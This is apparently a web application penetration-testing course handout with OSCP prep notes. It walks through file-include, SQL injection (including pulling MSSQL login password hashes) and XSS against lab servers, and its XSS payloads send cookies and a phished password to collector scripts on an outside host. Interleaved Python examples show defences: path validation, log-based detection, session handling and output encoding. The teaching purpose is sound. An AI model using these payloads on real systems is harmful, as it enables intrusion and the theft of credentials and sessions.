Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by the terminating single quote appended by the web application. Instead, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.


#########################
# File Handling Attacks #
#########################

Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)

---------------------------Type This-----------------------------------

http://45.63.104.73/showfile.php?filename=about.txt

-----------------------------------------------------------------------


See if you can read files on the file system:
---------------------------Type This-----------------------------------

http://45.63.104.73/showfile.php?filename=/etc/passwd
-----------------------------------------------------------------------

We call this attack a Local File Include or LFI.

Now let's find some text out on the internet somewhere:
https://www.gnu.org/software/hello/manual/hello.txt


Now let's put that URL in place of the filename in our LFI, and instead of it being Local it is now a Remote File Include or RFI:

---------------------------Type This-----------------------------------

http://45.63.104.73/showfile.php?filename=https://www.gnu.org/software/hello/manual/hello.txt
-----------------------------------------------------------------------

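The showfile.php behaviour above comes from handing the filename parameter straight to a file-opening call. As an added example that is not part of the course and not the lab's PHP, here is a Python resolver that accepts only a relative name inside one document root: it rejects URLs (the RFI case), absolute paths and NUL bytes, and checks the canonical path after symlinks and ".." are collapsed so the result cannot escape the root (the LFI case). The document root is a temporary directory created by make_demo_root() holding a constructed about.txt; both are mine.

```python
import os
import tempfile
from urllib.parse import urlsplit


class FileAccessError(Exception):
    """Raised for any filename that is not a plain file under the document root."""


def resolve_requested_file(doc_root, filename):
    """Map a user-supplied filename to an absolute path under doc_root, or raise."""
    if not filename or "\x00" in filename:
        raise FileAccessError("empty filename or NUL byte")
    # An explicit scheme or host (https://..., //host/...) is a remote include attempt.
    parts = urlsplit(filename)
    if parts.scheme or parts.netloc:
        raise FileAccessError("remote locations are not allowed")
    # Absolute paths such as /etc/passwd are never valid here.
    if os.path.isabs(filename):
        raise FileAccessError("absolute paths are not allowed")
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, filename))
    # realpath() collapses ../ and follows symlinks; the result must still be inside root.
    if os.path.commonpath([root, candidate]) != root:
        raise FileAccessError("path escapes the document root")
    if not os.path.isfile(candidate):
        raise FileAccessError("no such file")
    return candidate


def show_file(doc_root, filename):
    """Return ("ok", contents) or ("rejected", reason); the real path is never revealed."""
    try:
        path = resolve_requested_file(doc_root, filename)
    except FileAccessError as exc:
        return ("rejected", str(exc))
    with open(path, "r", encoding="utf-8") as fh:
        return ("ok", fh.read())


def make_demo_root():
    """Constructed document root holding one sample file for the demo."""
    root = tempfile.mkdtemp(prefix="showfile_demo_")
    with open(os.path.join(root, "about.txt"), "w", encoding="utf-8") as fh:
        fh.write("About page (constructed sample content)\n")
    return root


if __name__ == "__main__":
    root = make_demo_root()
    for name in ("about.txt", "/etc/passwd", "../../../../etc/passwd",
                 "https://www.gnu.org/software/hello/manual/hello.txt"):
        print(f"{name!r:60} -> {show_file(root, name)[0]}")
```

The check on the canonical path is the one that matters: a denylist of "../" is easy to get wrong (encoded dots, symlinked directories), whereas comparing realpath() output against the root catches every route that ends up outside it. Serving from an allowlist of known filenames is stricter still and is the right choice when the set of files is small.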
#########################################################################################
# SQL Injection                                                                         #
# http://45.63.104.73/1-Intro_To_SQL_Intection.pptx                                     #
#########################################################################################


- Another quick way to test for SQLI is to remove the parameter value


#############################
# Error-Based SQL Injection #
#############################
---------------------------Type This-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--        NOTE: "N" just means to keep going until you run out of databases
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--

-----------------------------------------------------------------------



#############################
# Union-Based SQL Injection #
#############################

---------------------------Type This-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
-----------------------------------------------------------------------

We are using a union select statement because we are joining the developer's query with one of our own.
Reference:
http://www.techonthenet.com/sql/union.php
The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
It removes duplicate rows between the various SELECT statements (UNION ALL, which we use above, keeps them).

Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.

---------------------------Type This-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
-----------------------------------------------------------------------

Negating the parameter value (changing the id=2 to id=-2) will force the page to display the columns that echo back data.

---------------------------Type This-----------------------------------

http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--

-----------------------------------------------------------------------


1250
1251- Another way is to see if you can get the backend to perform an arithmetic function
1252
1253---------------------------Type This-----------------------------------
1254
1255http://45.77.162.239/bookdetail.aspx?id=(2)
1256http://45.77.162.239/bookdetail.aspx?id=(4-2)
1257http://45.77.162.239/bookdetail.aspx?id=(4-1)
1258
1259
1260
1261http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
1262http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
1263http://45.77.162.239/bookdetail.aspx?id=1*1
1264http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
1265http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
1266http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
1267http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
1268http://45.77.162.239/bookdetail.aspx?id=2 &0#
1269
1270
1271
1272http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
1273http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
1274http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
1275http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
1276
1277-----------------------------------------------------------------------
1278
1279
1280###############################
1281# Blind SQL Injection Testing #
1282###############################
1283Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
1284
12853 - Total Characters
1286---------------------------Type This-----------------------------------
1287
1288http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
1289http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
1290http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
1291-----------------------------------------------------------------------
1292
1293Let's go for a quick check to see if it's DBO
1294
1295---------------------------Type This-----------------------------------
1296
1297http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
1298-----------------------------------------------------------------------
1299
1300Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
1301
1302---------------------------Type This-----------------------------------
1303
1304D - 1st Character
1305http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
1306http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
1307http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
1308http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
1309
1310B - 2nd Character
1311http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1312http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1313
1314O - 3rd Character
1315http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1316http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
1317http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1318http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1319http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
1320http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
1321http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1322
1323-----------------------------------------------------------------------
1324
1325
1326
1327
1328
1329
1330
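Every probe in the error-based, union-based and blind sections above leaves a distinctive request in the web server's access log, which is where a defender (or someone reconstructing the lab afterwards) finds them. The following Python is an added example, not course material: it parses a few constructed Apache combined-format lines, URL-decodes the request target, matches the decoded query against the same constructs the walkthrough used (order by N, union ... select, WAITFOR DELAY, @@version and other MSSQL metadata, tautologies, and a trailing comment), and tallies hits per source IP. The log lines, IPs and timestamps are invented.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines; hosts, IPs and timestamps are invented.
SAMPLE_LOG = """\
10.0.0.7 - - [16/Mar/2020:14:44:01 +0000] "GET /bookdetail.aspx?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [16/Mar/2020:14:44:05 +0000] "GET /bookdetail.aspx?id=2%20order%20by%20100-- HTTP/1.1" 500 812 "-" "Mozilla/5.0"
10.0.0.7 - - [16/Mar/2020:14:44:09 +0000] "GET /bookdetail.aspx?id=-2+union+all+select+1,user,@@version,4,5,6,7,8,9-- HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
10.0.0.7 - - [16/Mar/2020:14:44:20 +0000] "GET /bookdetail.aspx?id=2;%20IF%20(LEN(USER)=3)%20WAITFOR%20DELAY%20'00:00:10'-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Mar/2020:14:45:00 +0000] "GET /bookdetail.aspx?id=3 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Mar/2020:14:45:02 +0000] "GET /search.aspx?q=order+form HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each signature corresponds to a probe shown in the walkthrough above.
SIGNATURES = {
    "column-count probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union select":       re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "time-based blind":   re.compile(r"\bwaitfor\s+delay\b", re.I),
    "mssql metadata":     re.compile(r"@@version|@@servername|\bdb_name\s*\(|\bsysobjects\b|\bsql_logins\b", re.I),
    "tautology":          re.compile(r"\b(?:or|and)\s+\d+\s*(?:=|<>|!=)\s*\d+", re.I),
    "comment terminator": re.compile(r"(?:--|#)\s*$"),
}


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify_request(raw_path):
    """Decode the request target once and return the names of all matching signatures."""
    decoded = unquote_plus(raw_path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def analyze_log(log_text):
    """Map each source IP with at least one hit to a Counter of signature names."""
    report = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify_request(rec["path"])
        if hits:
            report.setdefault(rec["ip"], Counter()).update(hits)
    return report


def suspicious_sources(log_text, min_signatures=2):
    """Sources that triggered at least min_signatures distinct signature types."""
    return sorted(ip for ip, c in analyze_log(log_text).items() if len(c) >= min_signatures)


if __name__ == "__main__":
    for ip, counts in analyze_log(SAMPLE_LOG).items():
        print(ip, dict(counts))
    print("suspicious:", suspicious_sources(SAMPLE_LOG))
```

Decoding before matching is the important step: the same payload arrives as %20, as + or literally, and a pattern applied to the raw line misses two of the three. Requiring more than one distinct signature type per source keeps a single "order form" search from raising an alert, while a source that probes column counts and then issues WAITFOR DELAY requests stands out immediately.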
################################
# Playing with session cookies #
################################

-----------------------------------------------------------------------
Step 1: Browse to NewEgg.com
-------------------------Paste this into a browser--------------------------------
https://secure.newegg.com/
----------------------------------------------------------------------------------


Step 2: Browse to the shopping cart page NewEgg.com
-------------------------Paste this into Firefox-----------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
----------------------------------------------------------------------------------


Step 3: View the current session ID
--------------------------Paste this into a browser---------------------------------
javascript:void(document.write(document.cookie))
------------------------------------------------------------------------------------

Step 4: Go back to the shopping cart page (click the back button)
---------------------------------------------------------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
---------------------------------------------------------------------------------


Step 5: Now let's modify the session ID
--------------------------Paste this into a browser---------------------------------
javascript:void(document.cookie="PHPSessionID=wow-this-is-fun")
------------------------------------------------------------------------------------


Step 6: Go back to the shopping cart page (click the back button)
---------------------------------------------------------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
---------------------------------------------------------------------------------


Step 7: View the current session ID
--------------------------Paste this into a browser---------------------------------
javascript:void(document.write(document.cookie))
------------------------------------------------------------------------------------

-----------------------------------------------------------------------

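What the NewEgg steps above test is whether the server trusts whatever value comes back in the session cookie. As an added example, not course material and not NewEgg's code, here is the server side of a session design where the cookie is only an opaque lookup key: an unknown or expired value such as wow-this-is-fun yields a fresh anonymous session instead of someone else's cart, the ID is rotated after login, and the Set-Cookie attributes keep the value away from page scripts. The cookie name SessionID, the cart contents and the clock values are my choices.

```python
import secrets
import time

COOKIE_NAME = "SessionID"   # assumed name for this demo; the lab page shows PHPSessionID


class SessionStore:
    """Server-side store keyed by a random ID; the cookie value carries no state itself."""

    def __init__(self, ttl_seconds=1800):
        self._sessions = {}
        self.ttl = ttl_seconds

    def create(self, data, now=None):
        sid = secrets.token_urlsafe(32)          # 256 random bits: not guessable or enumerable
        self._sessions[sid] = {"data": dict(data), "expires": self._now(now) + self.ttl}
        return sid

    def lookup(self, sid, now=None):
        """Return the session data for a known, unexpired ID, else None."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if self._now(now) > entry["expires"]:
            del self._sessions[sid]               # expired: forget it
            return None
        return entry["data"]

    def rotate(self, sid, now=None):
        """Issue a new ID for an existing session (do this at login, against fixation)."""
        data = self.lookup(sid, now)
        if data is None:
            return None
        del self._sessions[sid]
        return self.create(data, now)

    @staticmethod
    def _now(now):
        return time.time() if now is None else now


def parse_cookie_header(header):
    """Minimal Cookie: header parser, enough for name=value pairs."""
    cookies = {}
    for part in (header or "").split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def set_cookie_header(sid):
    """HttpOnly keeps document.cookie from reading it; Secure keeps it off plain HTTP."""
    return f"{COOKIE_NAME}={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def handle_cart_request(store, cookie_header, now=None):
    """Serve the cart page: honour the cookie only if the store recognises it."""
    sid = parse_cookie_header(cookie_header).get(COOKIE_NAME)
    data = store.lookup(sid, now) if sid else None
    if data is None:
        sid = store.create({"cart": []}, now)    # unknown, tampered or expired: start fresh
        return {"session": "new", "sid": sid, "cart": [], "set_cookie": set_cookie_header(sid)}
    return {"session": "existing", "sid": sid, "cart": list(data["cart"]), "set_cookie": None}


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create({"cart": ["constructed item 1"]})
    print(handle_cart_request(store, f"{COOKIE_NAME}={sid}")["session"])            # existing
    print(handle_cart_request(store, f"{COOKIE_NAME}=wow-this-is-fun")["session"])  # new
```

With this design the only thing a modified cookie can do is lose the visitor's own session; there is no state in the value to tamper with and no way to land in another user's cart short of guessing a 256-bit token. Rotating the ID at login closes session fixation, and the short TTL limits how long a leaked token is useful.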
###########################################
# What is XSS                             #
# http://45.63.104.73/2-Intro_To_XSS.pptx #
###########################################

OK - what is Cross Site Scripting (XSS)?

1. Use Firefox to browse to the following location:
---------------------------Type This-----------------------------------

 http://45.63.104.73/xss_practice/
-----------------------------------------------------------------------

 A really simple search page that is vulnerable should come up.


2. In the search box type:
---------------------------Type This-----------------------------------

 <script>alert('So this is XSS')</script>
-----------------------------------------------------------------------


 This should pop up an alert window with your message in it, proving XSS is in fact possible.
 Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/


3. In the search box type:
---------------------------Type This-----------------------------------

 <script>alert(document.cookie)</script>
-----------------------------------------------------------------------


 This should pop up an alert window with your cookie in it, proving XSS is in fact possible and your cookie can be accessed.
 Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/

4. Now replace that alert script with:
---------------------------Type This-----------------------------------

 <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
-----------------------------------------------------------------------


This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.


5. Now view the stolen cookie at:
---------------------------Type This-----------------------------------

 http://45.63.104.73/xss_practice/cookie_stealer_logs.html
-----------------------------------------------------------------------


The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.


############################
# A Better Way To Demo XSS #
############################


Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.


Use Firefox to browse to the following location:
---------------------------Type This-----------------------------------

 http://45.63.104.73/xss_practice/
-----------------------------------------------------------------------


Paste this in the search box
----------------------------

---------------------------Type This-----------------------------------

<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>
-----------------------------------------------------------------------


Now view the stolen passwords at:
---------------------------Type This-----------------------------------

 http://45.63.104.73/xss_practice/passwords.html

-----------------------------------------------------------------------

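Both XSS demos above (the cookie catcher and the fake password prompt) work because the search page reflects the query into the HTML untouched. As an added example that is not the lab page's code, here is that reflection in Python with and without context-aware output encoding, together with the response headers that blunt each step of the demo: HttpOnly on the session cookie keeps document.cookie from reading it, and a Content-Security-Policy without 'unsafe-inline' keeps an injected inline script block from executing at all. The cookie name and the policy values are my choices; the payload strings are the ones used in the steps above.

```python
import html
from urllib.parse import quote

# Payloads from the walkthrough above, used here only as test input.
COOKIE_PAYLOAD = "<script>alert(document.cookie)</script>"
PROMPT_PAYLOAD = "<script>password=prompt('Your session is expired');</script>"


def render_search_vulnerable(query):
    """Mirrors the lab's search page: the query lands in the HTML unchanged."""
    return "<h1>Search results for: " + query + "</h1>"


def render_search_safe(query):
    """Element-content context: entity-encode <, >, &, and both quote characters."""
    return "<h1>Search results for: " + html.escape(query, quote=True) + "</h1>"


def render_search_again_link(query):
    """URL-attribute context: percent-encode for the URL, then entity-encode for the attribute."""
    href = "/xss_practice/?q=" + quote(query, safe="")
    return '<a href="' + html.escape(href, quote=True) + '">search again</a>'


def has_script_element(doc):
    """Crude check used by this demo: does the markup contain a live <script> tag?"""
    return "<script" in doc.lower()


def security_headers(session_id):
    """Headers that remove the payoff of both demos even if encoding is missed somewhere."""
    return {
        # HttpOnly: document.cookie cannot read the value, so the cookie catcher gets nothing.
        "Set-Cookie": f"SESSIONID={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax",
        # No 'unsafe-inline': the browser refuses to run an injected inline <script> block.
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; img-src 'self'; form-action 'self'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    print(render_search_vulnerable(COOKIE_PAYLOAD))
    print(render_search_safe(COOKIE_PAYLOAD))
    print(render_search_again_link(COOKIE_PAYLOAD))
```

The encoding has to match where the value lands: html.escape() is right for element content, but a value placed inside an href needs percent-encoding first or the browser will decode the entities back into a working URL. The headers are defence in depth rather than a substitute; the password-prompt demo in particular still shows a convincing dialog if the script runs, so the CSP that stops inline scripts is the control that defeats it.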
###############################################################
# Question 1: What is the process that you use when you test? #
###############################################################

Step 1: Automated Testing

Step 1a: Web Application vulnerability scanners
-----------------------------------------------
- Run two (2) unauthenticated vulnerability scans against the target
- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
- Run two (2) authenticated vulnerability scans against the target with admin privileges

The web application vulnerability scanners that I use for this process are HP Web Inspect and Acunetix.

A good web application vulnerability scanner comparison website is here:
http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html


Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.

When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not, you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.


Be sure to look for scans that take more than 3 or 4 hours, as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.


Also, be sure to save the scan results and logs. I usually provide this data to the customer.



Step 1b: Directory Brute Forcer
-------------------------------
I like to run DirBuster or a similar tool. This is great for finding hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).



Step 2: Manual Testing

Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).

Step 2a: Spider/Scan the entire site with Burp Suite
Save the spider and scan results. I usually provide this data to the customer as well.


Step 2b: Browse through the site using the 3 question method
Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.

Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.

Here is what I mean:
http://www.site.com/page.aspx?parametername=parametervalue

When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:

http://www.site.com/page.aspx?parametername=[ payload ]

You need to ensure that you send the payload this way, and like this below:

http://www.site.com/page.aspx?parametername=parametervalue[ payload ]

This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.



###########################################
# Question 2: How much fuzzing is enough? #
###########################################
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.

Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.


Step 1: Ask yourself the 3 questions per page of the site.

Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)

Step 3: When you load your fuzz strings - use the following decision tree

 - Are the fuzz strings causing a default error message (example 404)?
   - If this is the case then it is most likely NOT vulnerable

 - Are the fuzz strings causing a WAF or LB custom error message?
   - If this is the case then you need to find an encoding method to bypass


 - Are the fuzz strings causing an error message that discloses the backend type?
   - If yes, then identify the DB type and find the correct syntax to successfully exploit
   - Some example strings that I use are:
       '
       "
       ()        <----- Take the parameter value and put it in parentheses
       (5-1)     <----- See if you can perform an arithmetic function


 - Are the fuzz strings rendering executable code?
   - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
   - Some example strings that I use are:
       <b>hello</b>
       <u>hello</u>
       <script>alert(123);</script>
       <script>alert(xss);</script>
       <script>alert('xss');</script>
       <script>alert("xss");</script>



#######################
# Bug Bounty Programs #
#######################
https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65


############################
# Bug Hunter's Methodology #
############################
https://www.youtube.com/watch?v=C4ZHAdI8o1w
https://www.youtube.com/watch?v=-FAjxUOKbdI



#########################################
# Web Application Security Job Roles    #
# Application Assessor level 1          #
#########################################
Required Technical Skills: Comfortable with basic Linux/Windows (Linux+/MCSA)
                           Comfortable with basic web application fundamentals
                           Comfortable with security fundamentals (Security+)


Job Task: Run Web App security scanners and assist with documentation of Web App vulnerabilities


Tools Used:
    HP Web Inspect
    IBM AppScan
    AppSpider
    Acunetix Web App Vulnerabilities
    Netsparker
    Qualys



#########################################
# Web Application Security Job Roles    #
# Application Assessor level 2          #
#########################################
Required Technical Skills: Comfortable with manual web app pentesting (eWPTv1/GWAPT)
                           Comfortable with basic web application programming
                           Comfortable researching IT security issues


Job Task: Run Web App security scanners and assist with documentation of Web App vulnerabilities
          Perform manual vulnerability validation
          Analyze public exploits and develop threat analysis reports
          Assess simple applications for vulnerabilities


Tools Used:
    Burp Suite
    OWASP Zap
    Fiddler
    Charles Proxy Web App Vulnerabilities



#########################################
# Security Operations Center Job Roles  #
# Application Assessor level 3          #
#########################################
Required Technical Skills: Comfortable with manual web app pentesting (eWPTv2)
                           Comfortable with manual mobile app pentesting (eMAPT)
                           Comfortable with advanced web application programming


Job Task: Run Web App security scanners and assist with documentation of Web App vulnerabilities
          Perform manual vulnerability validation
          Analyze public exploits and develop threat analysis reports
          Assess complex web apps and mobile applications for vulnerabilities


Tools Used:
    Burp Suite
    OWASP Zap
    Fiddler
    Charles Proxy Web App Vulnerabilities



-------------------------------------------------------------------------------------------------------------


##########################################
#    How to prepare for the OSCP exam    #
##########################################

The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.


Issue 1. Lack of a thorough attack process
==========================================
 - Host discovery
 - Service discovery
 - Service version discovery
 - Vulnerability research
 - Linux (port 111)/Windows (port 445) Enumeration
 - Webserver vulnerability scan
 - Directory brute force every webserver
 - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
 - Brute force all services



Issue 2. Lack of automation of the process
==========================================
 - Organize your notes and resources so you can automate your attack process:
   - https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
   - https://github.com/sinfulz/JustTryHarder
   - https://herrfeder.github.io/pentesting/2018/09/30/OSCP-Cheat-Sheet.html

 - Research attack scripts on the internet to enhance your methodology

 - OSCP scripts
   - https://github.com/codingo/Reconnoitre
   - https://github.com/mikaelkall/massrecon
   - https://github.com/fchyla/pwk_scripts

 - Network Pentest Automation Scripts
   - https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
   - https://github.com/1N3/Sn1per
   - https://github.com/leebaird/discover



Issue 3. Failing to document all steps being performed and their output
=======================================================================



Issue 4. Lack of sleep during the exam
======================================



Issue 5. Failing to reboot target machines prior to attack
==========================================================



--------------------------------------------------------------------------------------------------------------


A good strategy to use to prepare for the OSCP would be:

Step 1. Ensure that you are comfortable with Linux
--------------------------------------------------
- LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
- Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, including simple shell scripting, and well beyond a Linux user skill level)

You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):
https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E



Step 2. You should be comfortable with the following tools:
-----------------------------------------------------------

Nmap:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo

Metasploit:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja

Burp Suite:
https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV

Sqlmap:
https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75

Nikto:
https://www.youtube.com/watch?v=GH9qn_DBzCk

Enum4Linux:
https://www.youtube.com/watch?v=hA5raaGOQKQ

RPCINFO/SHOWMOUNT:
https://www.youtube.com/watch?v=FlRAA-1UXWQ

Hydra:
https://www.youtube.com/watch?v=rLtj8tEmGso



Step 3. You need to be comfortable with basic exploit development
